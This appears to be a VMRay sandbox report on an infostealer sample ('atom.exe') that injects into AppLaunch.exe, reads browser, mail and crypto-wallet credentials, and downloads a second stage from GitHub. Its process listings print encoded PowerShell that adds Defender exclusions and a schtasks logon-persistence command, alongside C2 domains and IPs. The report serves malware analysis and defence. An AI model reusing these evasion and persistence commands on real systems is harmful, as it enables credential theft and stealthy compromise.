MALICIOUS DYNAMIC ANALYSIS REPORT # X-Ray Vision for Malware / 36. Classifications: Injector Spyware.

(1)

MALICIOUS

Classifications: Injector Spyware

Threat Names: - Verdict Reason: -

Sample Type Windows Exe (x86-32)

File Name atom.exe

ID #3210845

MD5 9589c93c73bb3529f9ba711a27998fd2

SHA1 d5536307d1e5861bbdef3f36a7d012cdeaffb5a0

SHA256 c4f35392a0fc133f2607176175e370673855e25ae8ea1814b705289d3b00f978

File Size 1416.00 KB

Report Created 2021-12-31 15:01 (UTC+1)

Target Environment win7_64_sp1_en_mso2016 | exe

(2)

OVERVIEW

VMRay Threat Identifiers (33 rules, 75 matches)

Score Category Operation Count Classification

5/5 Data Collection Tries to read cached credentials of various applications 1 Spyware

Tries to read sensitive data of: Opera, k-Meleon, Total Commander, Cyberfox, The Bat!, Mozilla Thunderbird, Comodo IceDragon, Electrum Bitcoin Wallet, Internet Explorer / Edge, Windows Mail, Exodus Cryptocurrency Wallet, Mozilla Firefox.

•

4/5 Injection Writes into the memory of another process 1 Injector

(Process #1) atom.exe modifies memory of (process #2) applaunch.exe.

•

4/5 Injection Modifies control flow of another process 1 -

(Process #1) atom.exe alters context of (process #2) applaunch.exe.

•

3/5 Defense Evasion Tries to detect the presence of antivirus software 1 -

(Process #2) applaunch.exe tries to detect antivirus software via WMI query: "SELECT * FROM AntivirusProduct".

•

3/5 Defense Evasion Tries to detect the presence of anti-spyware software 1 -

(Process #2) applaunch.exe tries to detect anti-spyware software via WMI query: "SELECT * FROM AntiSpyWareProduct".

•

3/5 Defense Evasion Tries to detect the presence of firewall software 1 -

(Process #2) applaunch.exe tries to detect firewall via WMI query: "SELECT * FROM FirewallProduct".

•

3/5 Data Collection Reads cryptocurrency wallet locations 2 -

(Process #2) applaunch.exe tries to read the cryptocurrency wallet "Electrum Bitcoin Wallet" for "BTC".

(Process #2) applaunch.exe tries to read the cryptocurrency wallet "Exodus Cryptocurrency Wallet".

•

2/5 Anti Analysis Tries to detect virtual machine 2 -

(Process #1) atom.exe reads out system information, commonly used to detect "VirtualBox" via registry. (Key is "HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__").

Multiple processes are possibly trying to detect a VM via rdtsc.

•

2/5 Anti Analysis Tries to detect application sandbox 2 -

(Process #1) atom.exe tries to detect "Comodo Sandbox" by checking for existence of module "cmdvrt32.dll".

(Process #1) atom.exe tries to detect "Sandboxie" by checking for existence of module "SbieDll.dll".

•

2/5 Discovery Reads network adapter information 1 -

(Process #2) applaunch.exe reads the network adapters' addresses by API.

•

2/5 Discovery Executes WMI query 8 -

(3)

Score Category Operation Count Classification

2/5 Discovery Collects hardware properties 1 -

(Process #2) applaunch.exe queries hardware properties via WMI.

•

2/5 Data Collection Reads sensitive ftp data 1 -

(Process #2) applaunch.exe tries to read sensitive data of ftp application "Total Commander" by file.

•

2/5 Data Collection Reads sensitive mail data 3 -

(Process #2) applaunch.exe tries to read sensitive data of mail application "The Bat!" by file.

(Process #2) applaunch.exe tries to read sensitive data of mail application "Windows Mail" by file.

(Process #2) applaunch.exe tries to read sensitive data of mail application "Mozilla Thunderbird" by file.

•

2/5 Data Collection Reads sensitive browser data 6 -

(Process #2) applaunch.exe tries to read sensitive data of web browser "Internet Explorer / Edge" by file.

(Process #2) applaunch.exe tries to read sensitive data of web browser "Opera" by file.

(Process #2) applaunch.exe tries to read sensitive data of web browser "Mozilla Firefox" by file.

(Process #2) applaunch.exe tries to read sensitive data of web browser "k-Meleon" by file.

(Process #2) applaunch.exe tries to read sensitive data of web browser "Comodo IceDragon" by file.

(Process #2) applaunch.exe tries to read sensitive data of web browser "Cyberfox" by file.

•

2/5 Discovery Queries OS version via WMI 1 -

(Process #2) applaunch.exe queries OS version via WMI.

•

2/5 Discovery Enumerates running processes 1 -

(Process #2) applaunch.exe enumerates running processes via WMI.

•

2/5 Task Scheduling Schedules task 1 -

Schedules task for command "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe", to be triggered by Logon.

•

2/5 Task Scheduling Schedules task via schtasks 1 -

Schedules task "services" via the schtasks command line utility.

•

2/5 Anti Analysis Makes direct system call to possibly evade hooking based sandboxes 16 -

(Process #6) build.exe makes a direct system call to "NtOpenFile".

(Process #6) build.exe makes a direct system call to "NtCreateSection".

(Process #6) build.exe makes a direct system call to "NtMapViewOfSection".

(Process #6) build.exe makes a direct system call to "NtUnmapViewOfSection".

(Process #6) build.exe makes a direct system call to "NtClose".

(Process #6) build.exe makes a direct system call to "NtProtectVirtualMemory".

(Process #6) build.exe makes a direct system call to "NtQueryVirtualMemory".

(Process #6) build.exe makes a direct system call to "NtAllocateVirtualMemory".

(Process #14) services.exe makes a direct system call to "NtOpenFile".

(Process #14) services.exe makes a direct system call to "NtCreateSection".

(Process #14) services.exe makes a direct system call to "NtMapViewOfSection".

(Process #14) services.exe makes a direct system call to "NtUnmapViewOfSection".

(Process #14) services.exe makes a direct system call to "NtClose".

(Process #14) services.exe makes a direct system call to "NtProtectVirtualMemory".

(Process #14) services.exe makes a direct system call to "NtQueryVirtualMemory".

(Process #14) services.exe makes a direct system call to "NtAllocateVirtualMemory".

•

(4)

Score Category Operation Count Classification

1/5 Hide Tracks Creates process with hidden window 4 -

(Process #1) atom.exe starts (process #2) applaunch.exe with a hidden window.

(Process #6) build.exe starts (process #7) cmd.exe with a hidden window.

•

1/5 Obfuscation Reads from memory of another process 1 -

(Process #1) atom.exe reads from (process #2) applaunch.exe.

•

1/5 Obfuscation Creates a page with write and execute permissions 1 -

(Process #1) atom.exe allocates a page in a foreign process with "PAGE_EXECUTE_READWRITE" permissions, often used to dynamically unpack code.

•

1/5 Privilege Escalation Enables process privilege 1 -

(Process #2) applaunch.exe enables process privilege "SeDebugPrivilege".

•

1/5 Discovery Possibly does reconnaissance 1 -

(Process #2) applaunch.exe tries to gather information about application "Steam" by registry.

•

1/5 Execution Drops PE file 1 -

(Process #2) applaunch.exe drops file "C:\Users\kEecfMwgj\AppData\Local\Temp\build.exe".

•

1/5 Execution Executes dropped PE file 1 -

Executes dropped file "C:\Users\kEecfMwgj\AppData\Local\Temp\build.exe".

•

1/5 Network Connection Performs DNS request 4 -

(Process #2) applaunch.exe resolves host name "vataeagene.xyz" to IP "94.140.115.160".

(Process #2) applaunch.exe resolves host name "api.ip.sb" to IP "172.67.75.172".

(Process #2) applaunch.exe resolves host name "github.com" to IP "140.82.121.4".

(Process #2) applaunch.exe resolves host name "raw.githubusercontent.com" to IP "185.199.110.133".

•

1/5 Network Connection Connects to remote host 4 -

(Process #2) applaunch.exe opens an outgoing TCP connection to host "140.82.121.4:443".

•

1/5 Network Connection Tries to connect using an uncommon port 1 -

(Process #2) applaunch.exe tries to connect to TCP port 81 at 94.140.115.160.

•

1/5 Obfuscation Resolves API functions dynamically 2 -

(5)

Score Category Operation Count Classification

(Process #1) atom.exe crashed.

•

(6)

Mitre ATT&CK Matrix

Initial Access Execution Persistence Privilege Escalation

Defense Evasion

Credential

Access Discovery Lateral

Movement Collection Command

and Control Exfiltration Impact

#T1047 Windows Management Instrumentation

#T1053 Scheduled

Task

#T1053 Scheduled

Task

#T1497 Virtualization/

Sandbox Evasion

#T1081 Credentials in

Files

#T1497 Virtualization/

Sandbox Evasion

#T1119 Automated Collection

#T1065 Uncommonly

Used Port

#T1053 Scheduled

Task

#T1143 Hidden

Window #T1012 Query

Registry

#T1005 Data from Local

System

#T1045 Software Packing

#T1016 System Network Configuration

Discovery

#T1027 Obfuscated

Files or Information

#T1082 System Information

Discovery

#T1083 File and Directory

Discovery

#T1063 Security Software Discovery

#T1124 System Time

Discovery

(7)

Sample Information

Analysis Information

ID #3210845

MD5 9589c93c73bb3529f9ba711a27998fd2

SHA1 d5536307d1e5861bbdef3f36a7d012cdeaffb5a0

SHA256 c4f35392a0fc133f2607176175e370673855e25ae8ea1814b705289d3b00f978

SSDeep 24576:sE9/HxpgaqxonW5L4gHQzzxfitKZ/NLV7XDBP9hXiAN3D2XklPD3BJkEaHNYK34y:sI/Hfqx9sgHizYtuFFzBlhXJ3D2XklP0

ImpHash f6af73011d9ad7cbccf66eb190442910

File Name atom.exe

File Size 1416.00 KB

Sample Type Windows Exe (x86-32)

Has Macros

Creation Time 2021-12-31 15:01 (UTC+1)

Analysis Duration 00:04:00

Termination Reason Sample crashed

Number of Monitored Processes 10

Execution Successful False

Reputation Enabled

WHOIS Enabled

Built-in AV Enabled

Built-in AV Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files

Number of AV Matches 0

YARA Enabled

YARA Applied On Sample Files, PCAP File, Downloaded Files, Dropped Files, Modified Files, Memory Dumps, Embedded Files

Number of YARA Matches 0

(8)

(9)

Screenshots truncated

(10)

NETWORK

General

DNS

HTTP/S

HTTP Requests

Method URL Dest. IP Dest. Port Status Code Response Size Verdict

DNS Requests

Type Hostname Response Code Resolved IPs CNames Verdict

3352.68 KB total sent

8412.76 KB total received 2 ports 81, 443

5 contacted IP addresses

0 URLs extracted 0 files downloaded

0 malicious hosts detected

5 DNS requests for 4 domains 1 nameservers contacted

0 total requests returned errors

3 URLs contacted, 3 servers

3 sessions, 130.96 KB sent, 8393.98 KB received

GET https://github.com/gay225/hui/raw/main/build.exe - - 0 bytes NA

GET https://raw.githubusercontent.com/gay225/hui/main/build.exe - - 0 bytes NA

GET https://api.ip.sb/ip - - 0 bytes NA

A vataeagene.xyz NoError 94.140.115.160 NA

A api.ip.sb, api.ip.sb.cdn.cloudflare.net NoError 172.67.75.172,

104.26.13.31,

104.26.12.31 api.ip.sb.cdn.cloudflare.net NA

A github.com NoError 140.82.121.4 NA

A raw.githubusercontent.com NoError

185.199.110.133, 185.199.111.133, 185.199.108.133, 185.199.109.133

NA

- api.ip.sb - 172.67.75.172,

104.26.13.31, 104.26.12.31

NA

(11)

BEHAVIOR

Process Graph

Sample Start #1

atom.exe #2

applaunch.exe Modify Memory

Modify Control Flow Child Process

build.exe#6 Child Process

#7 cmd.exe Child Process

cmd.exe#11 Child Process

#13 cmd.exe Child Process

powershell.exe#8 Child Process

#10 powershell.exe Child Process

schtasks.exe#12 Child Process

#14 services.exe Child Process

(12)

Process #1: atom.exe

Host Behavior

Type Count

ID 1

File Name c:\users\keecfmwgj\desktop\atom.exe

Command Line "C:\Users\kEecfMwgj\Desktop\atom.exe"

Initial Working Directory C:\Users\kEecfMwgj\Desktop\

Monitor Start Time Start Time: 49096, Reason: Analysis Target Unmonitor End Time End Time: 88024, Reason: Crashed

Monitor duration 38.93s

Return Code 3221225477

PID 3788

Parent PID 912

Bitness 32 Bit

Module 319

Registry 11

Keyboard 1

System 7

- 1

File 5

Process 1

Environment 1

- 3

- 8

(13)

Process #2: applaunch.exe

Injection Information (3)

Injection Type Source Process Source / Target TID Address / Name Size Success Count

Dropped Files (1)

File Name File Size SHA256 YARA Match

Host Behavior

Type Count

Network Behavior

Type Count

ID 2

File Name c:\windows\microsoft.net\framework\v4.0.30319\applaunch.exe Command Line "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

Initial Working Directory C:\Users\kEecfMwgj\Desktop\

Monitor Start Time Start Time: 78257, Reason: Child Process Unmonitor End Time End Time: 157959, Reason: Terminated

Return Code 0

PID 3816

Parent PID 3788

Bitness 32 Bit

Modify Memory #1: c:

\users\keecfmwgj\desktop\a

tom.exe 0xed0 0x400000(4194304) 0x20000 1

Modify Memory #1: c:

tom.exe 0xed0 0xfffde008(4294828040) 0x4 1

Modify Control Flow #1: c:

tom.exe 0xed0 / 0xeec 0x779f01c4(2006909380) - 1

C:\Users\kEecfMwgj\AppData\Local\Temp\build.exe 6850.50 KB 0b73ec50b09ea9929e0db0a60135e211b8f80c424a151706531cb987661 7d1fe

Registry 279

Process 1

File 358

System 152

- 13

User 3

Module 68

Environment 8

Keyboard 3

COM 111

- 11

Window 2

HTTPS 3

(14)

Type Count

DNS 5

TCP 4

(15)

Process #6: build.exe

Dropped Files (1)

File Name File Size SHA256 YARA Match

Host Behavior

Type Count

ID 6

File Name c:\users\keecfmwgj\appdata\local\temp\build.exe Command Line "C:\Users\kEecfMwgj\AppData\Local\Temp\build.exe"

Initial Working Directory C:\Users\kEecfMwgj\AppData\Local\Temp\

Return Code 0

PID 3988

Parent PID 3816

Bitness 64 Bit

C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe 6850.50 KB 0b73ec50b09ea9929e0db0a60135e211b8f80c424a151706531cb987661 7d1fe

Module 37

File 14

System 12

Environment 1

Registry 1

- 3

Process 3

(16)

Process #7: cmd.exe

Host Behavior

Type Count

ID 7

File Name c:\windows\system32\cmd.exe

Command Line

"cmd" cmd /c powershell -EncodedCommand

"QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAK...

...BuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtA EYAbwByAGMAZQA=" & exit

Initial Working Directory C:\Windows\system32\

Monitor Start Time Start Time: 179505, Reason: Child Process

Unmonitor End Time End Time: 238724, Reason: Terminated

Return Code 1

PID 4028

Parent PID 3988

Bitness 64 Bit

Module 1

Environment 16

File 22

Process 2

(17)

Process #8: powershell.exe

Host Behavior

Type Count

ID 8

File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe

Command Line powershell -EncodedCommand

"QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQ BzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"

Return Code 1

PID 4056

Parent PID 4028

Bitness 64 Bit

System 15

Module 3

File 188

Environment 23

Registry 2

- 14

(18)

Process #10: powershell.exe

Host Behavior

Type Count

ID 10

File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe

Command Line powershell -EncodedCommand

"QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJ wBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="

Return Code 1

PID 2968

Parent PID 4028

Bitness 64 Bit

System 15

Module 3

File 165

Environment 19

Registry 2

- 14

(19)

Process #11: cmd.exe

Host Behavior

Type Count

ID 11

Command Line "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe"

Return Code 0

PID 1796

Parent PID 3988

Bitness 64 Bit

Module 1

Environment 8

File 7

Process 1

(20)

Process #12: schtasks.exe

Host Behavior

Type Count

ID 12

File Name c:\windows\system32\schtasks.exe

Command Line schtasks /create /f /sc onlogon /rl highest /tn "services" /tr "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe"

Return Code 0

PID 180

Parent PID 1796

Bitness 64 Bit

System 5

Module 8

COM 1

File 3

(21)

Process #13: cmd.exe

Host Behavior

Type Count

ID 13

Command Line "cmd" cmd /c "C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe"

PID 1752

Parent PID 3988

Bitness 64 Bit

Module 1

Environment 3

File 1

Process 1

(22)

Process #14: services.exe

Host Behavior

Type Count

ID 14

File Name c:\users\keecfmwgj\appdata\roaming\microsoft\services.exe Command Line C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe

PID 3368

Parent PID 1752

Bitness 64 Bit

Module 27

File 5

System 9

Environment 1

(23)

ARTIFACTS

File

SHA256 File Names Category File Size MIME Type Operations Verdict

Filename

File Name Category Operations Verdict

c4f35392a0fc133f260717617 5e370673855e25ae8ea1814 b705289d3b00f978

C:

\Users\kEecfMwgj\Desktop\atom.exe Sample File 1416.00 KB

application/

vnd.microsoft.portable-

executable Access MALICIOUS

0b73ec50b09ea9929e0db0a 60135e211b8f80c424a15170 6531cb9876617d1fe

C:

\Users\kEecfMwgj\AppData\Roaming\

Microsoft\services.exe, C:

\Users\kEecfMwgj\AppData\Local\Te mp\build.exe

Dropped File 6850.50 KB application/

vnd.microsoft.portable-

executable Create, Write, Access SUSPICIOUS

C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe Dropped File Create, Write, Access SUSPICIOUS

Accessed File Access CLEAN

C:\Users\kEecfMwgj\Desktop\atom.exe Sample File Access CLEAN

C:

\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.co

nfig Accessed File Access, Read CLEAN

C:

\Windows\Microsoft.NET\Framework\v4.0.30319\config\machine.con

fig Accessed File Access CLEAN

C:

\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe.Co

nfig Accessed File Access, Read CLEAN

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Accessed File Access CLEAN

C:\Users\kEecfMwgj\AppData\Local\Yandex\YaAddon Accessed File Create, Access CLEAN

C:\Users\kEecfMwgj\AppData\Local\Yandex Accessed File Create, Access CLEAN

C:\Users\kEecfMwgj\AppData\Local Accessed File Access CLEAN

C:\Program Files (x86)\Internet Explorer\iexplore.exe Accessed File Access CLEAN

C:\Users\kEecfMwgj\Desktop\LIL1t5-MkUPP65uzE1.docx Accessed File Access, Read CLEAN

C:\Users\kEecfMwgj\Desktop\mbkBMQJcCOYi9J.docx Accessed File Access, Read CLEAN

C:\Users\kEecfMwgj\Documents\0tbKWFp6.docx Accessed File Access, Read CLEAN

C:\Users\kEecfMwgj\Documents\8ySAiRvWX.docx Accessed File Access, Read CLEAN

C:\Users\kEecfMwgj\Documents\a2jfMMQ.docx Accessed File Access, Read CLEAN

C:\Users\kEecfMwgj\Documents\mNHHimg7n4rPqQp.docx Accessed File Access, Read CLEAN

C:\Users\kEecfMwgj\Documents\P3qvq.docx Accessed File Access, Read CLEAN

C:\Users\kEecfMwgj\AppData\Local\Temp\build.exe Dropped File Create, Write, Access CLEAN

\??\C:\Users\kEecfMwgj\AppData\Local\Temp\build.exe Accessed File Access CLEAN

System Paging File Accessed File Access CLEAN

C:

\Windows\Microsoft.NET\Framework64\v4.0.30319\config\machine.c

onfig Accessed File Access CLEAN

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Accessed File Access CLEAN

C:\Windows\system32 Accessed File Access CLEAN

C:\Windows Accessed File Access CLEAN

(24)

C:\Windows\System32\Wbem Accessed File Access CLEAN

C:\Windows\System32\WindowsPowerShell\v1.0\ Accessed File Access CLEAN

C:\Users\kEecfMwgj\Documents\WindowsPowerShell\Modules Accessed File Access CLEAN

C:\Program Files\WindowsPowerShell\Modules Accessed File Access CLEAN

C:\Program Files\WindowsPowerShell\Modules\Modules.psd1 Accessed File Access CLEAN

C:\Program Files\WindowsPowerShell\Modules\Modules.psm1 Accessed File Access CLEAN

C:\Program Files\WindowsPowerShell\Modules\Modules.cdxml Accessed File Access CLEAN

C:\Program Files\WindowsPowerShell\Modules\Modules.xaml Accessed File Access CLEAN

C:\Program Files\WindowsPowerShell\Modules\Modules.ni.dll Accessed File Access CLEAN

C:\Program Files\WindowsPowerShell\Modules\Modules.dll Accessed File Access CLEAN

C:\Program

Files\WindowsPowerShell\Modules\PackageManagement Accessed File Access CLEAN

C:\Program Files\WindowsPowerShell\Modules\PowerShellGet Accessed File Access CLEAN

C:\Program

Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\Pa

ckageManagement.psd1 Accessed File Access CLEAN

C:

\Users\kEecfMwgj\AppData\Local\Microsoft\Windows\PowerShell\M

oduleAnalysisCache Accessed File Access, Read CLEAN

C:\Program

Files\WindowsPowerShell\Modules\PackageManagement\PackageM anagement.psd1

C:\Program

Files\WindowsPowerShell\Modules\PackageManagement\PackageM

anagement.psm1 Accessed File Access CLEAN

C:\Program

anagement.cdxml Accessed File Access CLEAN

C:\Program

anagement.xaml Accessed File Access CLEAN

C:\Program

anagement.ni.dll Accessed File Access CLEAN

C:\Program

anagement.dll Accessed File Access CLEAN

C:\Program

Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerSh

ellGet.psd1 Accessed File Access CLEAN

C:\Program

Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.p

sd1 Accessed File Access CLEAN

C:\Program

Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.p

sm1 Accessed File Access CLEAN

C:\Program

(25)

C:\Windows\system32\WindowsPowerShell\v1.0\Modules Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.psd

1 Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.ps

m1 Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.cdx ml

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.xa

ml Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.ni.d

ll Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\Modules.dll Accessed File Access CLEAN

C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppLocker Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\CimCmdlets Accessed File Access CLEAN

C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.Po

werShell.Archive Accessed File Access CLEAN

C:

werShell.Diagnostics Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.Po werShell.Host

C:

werShell.LocalAccounts Accessed File Access CLEAN

C:

werShell.Management Accessed File Access CLEAN

C:

werShell.ODataUtils Accessed File Access CLEAN

C:

werShell.Security Accessed File Access CLEAN

C:

werShell.Utility Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.W

SMan.Management Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkSwi

tchManager Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredS

tateConfiguration Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDiagnosti

cs Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\PSSchedule

dJob Accessed File Access CLEAN

(26)

File Name Category Operations Verdict C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflow Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflow

Utility Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\Troubleshoo

tingPack Accessed File Access CLEAN

C:

werShell.Utility\Microsoft.PowerShell.Utility.psd1 Accessed File Access CLEAN

C:

werShell.Management\Microsoft.PowerShell.Management.psd1 Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\AppLocker\A

ppLocker.psd1 Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer

\BitsTransfer.psd1 Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\CimCmdlet s\CimCmdlets.psd1

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1 Accessed File Access CLEAN

C:

werShell.Archive\Microsoft.PowerShell.Archive.psd1 Accessed File Access CLEAN

C:

werShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1 Accessed File Access CLEAN

C:

werShell.Host\Microsoft.PowerShell.Host.psd1 Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.Po werShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.

psd1

C:

werShell.LocalAccounts\Microsoft.PowerShell.LocalAccounts.psd1 Accessed File Access CLEAN

C:

werShell.LocalAccounts\Microsoft.PowerShell.LocalAccounts.psm1 Accessed File Access CLEAN

C:

werShell.LocalAccounts\Microsoft.PowerShell.LocalAccounts.cdxml Accessed File Access CLEAN

C:

werShell.LocalAccounts\Microsoft.PowerShell.LocalAccounts.xaml Accessed File Access CLEAN

C:

werShell.LocalAccounts\Microsoft.PowerShell.LocalAccounts.ni.dll Accessed File Access CLEAN

C:

werShell.LocalAccounts\Microsoft.PowerShell.LocalAccounts.dll Accessed File Access CLEAN

(27)

URL

URL Category IP Address Country HTTP Methods Verdict

Domain

Domain IP Address Country Protocols Verdict

IP

IP Address Domains Country Protocols Verdict

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkSwi

tchManager\NetworkSwitchManager.psd1 Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDesiredS

tateConfiguration\PSDesiredStateConfiguration.psd1 Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\PSDiagnosti

cs\PSDiagnostics.psd1 Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\PSSchedule

dJob\PSScheduledJob.psd1 Accessed File Access CLEAN

C:

\PSWorkflow.psd1 Accessed File Access CLEAN

C:

Utility\PSWorkflowUtility.psd1 Accessed File Access CLEAN

C:

\Windows\system32\WindowsPowerShell\v1.0\Modules\Troubleshoo

tingPack\TroubleshootingPack.psd1 Accessed File Access CLEAN

C:\windows\system32\windowspowershell\v1.0\Modules Accessed File Access CLEAN

C:

\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.

config Accessed File Access, Read CLEAN

C:

\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.config Accessed File Access CLEAN

C:\Program

Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModul

e.psm1 Accessed File Access CLEAN

C:\Windows\system32\schtasks.exe Accessed File Access CLEAN

C:\Users\kEecfMwgj\AppData\Roaming\Microsoft Accessed File Access CLEAN

\??\C:\Users\kEecfMwgj\AppData\Roaming\Microsoft\services.exe Accessed File Access CLEAN

https://github.com/gay225/hui/raw/main/build.exe - 140.82.121.4 - GET CLEAN

https://raw.githubusercontent.com/gay225/hui/

main/build.exe - 185.199.110.133 - GET CLEAN

https://api.ip.sb/ip - 172.67.75.172 - GET CLEAN

vataeagene.xyz 94.140.115.160 - DNS CLEAN

api.ip.sb 104.26.13.31, 104.26.12.31, 172.67.75.172 - HTTPS, DNS CLEAN

api.ip.sb.cdn.cloudflare.net 104.26.12.31, 104.26.13.31, 172.67.75.172 - DNS CLEAN

github.com 140.82.121.4 - HTTPS, DNS CLEAN

raw.githubusercontent.com 185.199.108.133, 185.199.109.133,

185.199.110.133, 185.199.111.133 - HTTPS, DNS CLEAN

192.168.0.1 - - UDP, DNS CLEAN

140.82.121.4 github.com United States TCP, HTTPS, DNS CLEAN

(28)

IP Address Domains Country Protocols Verdict

Registry

Registry Key Operations Parent Process Name Verdict

185.199.110.133 raw.githubusercontent.com United States TCP, HTTPS, DNS CLEAN

94.140.115.160 vataeagene.xyz Latvia TCP, DNS CLEAN

172.67.75.172 api.ip.sb.cdn.cloudflare.net, api.ip.sb United States TCP, HTTPS, DNS CLEAN

104.26.13.31 api.ip.sb.cdn.cloudflare.net, api.ip.sb United States DNS CLEAN

104.26.12.31 api.ip.sb.cdn.cloudflare.net, api.ip.sb United States DNS CLEAN

185.199.111.133 raw.githubusercontent.com United States DNS CLEAN

HKEY_CURRENT_USER\Software\Borland\Locales access atom.exe CLEAN

HKEY_CURRENT_USER\Software\Borland\Delphi\Locales access atom.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVer

sion\Policies\System access atom.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVer

sion\Policies\System\EnableLUA access, read atom.exe CLEAN

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4

D36E968-E325-11CE-BFC1-08002BE10318}\0000 access atom.exe CLEAN

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4

D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc access, read atom.exe CLEAN

HKEY_LOCAL_MACHINE\Hardware\description\System access atom.exe CLEAN

HKEY_LOCAL_MACHINE\Hardware\description\System\SystemBio

sVersion access, read atom.exe CLEAN

HKEY_LOCAL_MACHINE\Hardware\description\System\VideoBios

Version access, read atom.exe CLEAN

HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ access atom.exe CLEAN

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\

AppContext access build.exe, applaunch.exe CLEAN

HKEY_LOCAL_MACHINE access build.exe, applaunch.exe CLEAN

HKEY_CURRENT_USER\SOFTWARE\Microsoft\.NETFramework\

XML access applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows

NT\CurrentVersion access applaunch.exe CLEAN

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows

NT\CurrentVersion\InstallationType access, read applaunch.exe CLEAN

v4.0.30319 access applaunch.exe CLEAN

(29)

Registry Key Operations Parent Process Name Verdict HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\

v4.0.30319\UseSafeSynchronousClose access, read applaunch.exe CLEAN

